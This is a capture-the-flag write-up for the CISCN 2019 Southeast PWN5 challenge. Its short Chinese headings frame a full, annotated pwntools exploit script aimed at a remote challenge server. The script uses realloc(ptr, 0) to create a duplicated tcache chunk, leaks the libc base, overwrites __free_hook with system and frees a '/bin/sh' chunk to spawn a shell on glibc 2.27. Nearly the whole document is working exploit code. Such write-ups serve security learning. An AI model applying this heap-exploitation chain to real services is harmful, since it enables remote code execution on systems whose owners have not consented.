Problem: [CISCN 2019东南]PWN5
思路
- 利用 realloc(ptr, 0) 造一个 dup 的 tcache chunk
EXP
#!/usr/bin/env python3
from pwn import *
# Target endpoint and local artefacts. The libc path pins one specific Ubuntu
# build (2.27-3ubuntu1); every hard-coded offset later in the script is only
# valid against that exact library, so swap both together or neither.
host = "node5.anna.nssctf.cn"
port = 26927
filename = "pwn_patched"
libcname = "/home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1/amd64/libc6_2.27-3ubuntu1_amd64/lib/x86_64-linux-gnu/libc.so.6"

# Debug-level logging dumps every byte exchanged with the target; lower it
# once the interaction is understood.
context(os='linux', arch='amd64', log_level='debug')
elf = context.binary = ELF(filename)
# `libc` only exists when a path is configured; the symbol lookups further
# down assume it is set.
if libcname:
    libc = ELF(libcname)

# gdb script used by the default (debug) launch mode: break at main and point
# gdb at the matching debug symbols and glibc sources for this build.
gs = '''
b main
set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1/amd64/libc6-dbg_2.27-3ubuntu1_amd64/usr/lib/debug
set directories /home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1/amd64/glibc-source_2.27-3ubuntu1_all/usr/src/glibc/glibc-2.27
'''
def start():
    """Open the tube to the target.

    `args.P` runs the binary as a plain local process and takes precedence
    when several flags are set; `args.R` connects to the remote service;
    with neither flag the binary is launched under gdb with the `gs` script.
    """
    if args.P:
        return process(elf.path)
    tube = remote(host, port) if args.R else gdb.debug(elf.path, gdbscript=gs)
    return tube
# Prompt the binary prints before every menu choice; the helpers below
# synchronise on it before sending anything.
menu = b'Your choice:'
# pwn :)
io = start()
def ch(idx):
    """Wait for the menu prompt and answer it with *idx* as a decimal line."""
    choice = str(idx).encode()
    io.sendlineafter(menu, choice)
def add(size, data = b'\n'):
    """Menu option 1: request *size* bytes and send *data* at the content prompt.

    *data* is sent raw (no newline appended), so the caller decides whether
    the content ends with one.
    """
    ch(1)
    io.sendlineafter(b'size?>', str(size).encode())
    io.sendafter(b'content:', data)
def edit(idx, data):
    """Menu option 2: select chunk *idx* and send *data* at the content prompt."""
    ch(2)
    io.sendlineafter(b'Index:', str(idx).encode())
    io.sendafter(b'content:', data)
def show(idx):
    """Menu option 3: ask the binary to print chunk *idx*.

    The caller is responsible for reading whatever follows the prompt.
    """
    ch(3)
    io.sendlineafter(b'Index:', str(idx).encode())
def free(idx):
    """Menu option 4: release chunk *idx*."""
    ch(4)
    io.sendlineafter(b'Index:', str(idx).encode())
def uafree(idx):
    """Take the edit path (menu option 2) on chunk *idx* and wait for the refusal.

    Unlike `edit`, no content is sent: the binary is expected to answer
    "Can not edit this flag!" for this index, and the helper blocks until that
    message arrives.
    """
    ch(2)
    io.sendlineafter(b'Index:', str(idx).encode())
    io.recvuntil(b'Can not edit this flag!')
def ex():
    """Send menu choice 5 (its label is not shown on this page)."""
    io.sendlineafter(menu, b'5')
# --- exploit sequence (top level; uses the helpers and `io` defined above) ---
# Everything here is pinned to the glibc 2.27 build named in `libcname`: the
# leak offset 0x3ec0d0 and the __free_hook / system symbol lookups. The chain
# also relies on behaviour later glibc releases removed or hardened (tcache
# double-free detection in 2.29, safe-linking of tcache next pointers in 2.32,
# __free_hook removed in 2.34), so it is a 2.27-specific demonstration.
add(0x500) #0 — large request; presumably sized so the free below does not land in tcache (TODO confirm)
add(0x60) #1 — second allocation; presumably keeps chunk 0 away from the top chunk while it is freed
free(0)
add(0x200, b'\xd0') #0 — reuse the freed region and write a single byte before reading it back
show(0)
io.recvuntil(b'Content: ')
# The six bytes printed after "Content: " are read back as a pointer
# (zero-padded to 8 bytes); 0x3ec0d0 is the hard-coded distance from that
# pointer to the libc base for this build.
libc_base = u64(io.recv(6).ljust(0x8, b'\x00')) - 0x3ec0d0
log.info("libc_base --> "+hex(libc_base))
add(0) #2 — size-0 request; per the write-up this goes through realloc(ptr, 0)
uafree(2) #2 freed but still in chunk_list[2] — the stale pointer the binary keeps is the root cause
add(0x10) #3 and 2 --> dup: index 3 receives the same chunk index 2 still references
add(0x10, b'/bin/sh\x00') #4 — the chunk freed at the very end
add(0x10) #5
free(5)
free(2) # chunk 2 is freed while index 3 still refers to it
edit(3, p64(libc_base + libc.sym['__free_hook'])) # write through the stale index 3 into the freed chunk
add(0x10) # first allocation hands back the freed chunk itself
add(0x10, p64(libc_base + libc.sym['system'])) # __free_hook to system — per the comment, this allocation is served at the address written above
free(4) # free() of the "/bin/sh" chunk now runs through __free_hook
io.interactive()
总结
- 对该题的考点总结
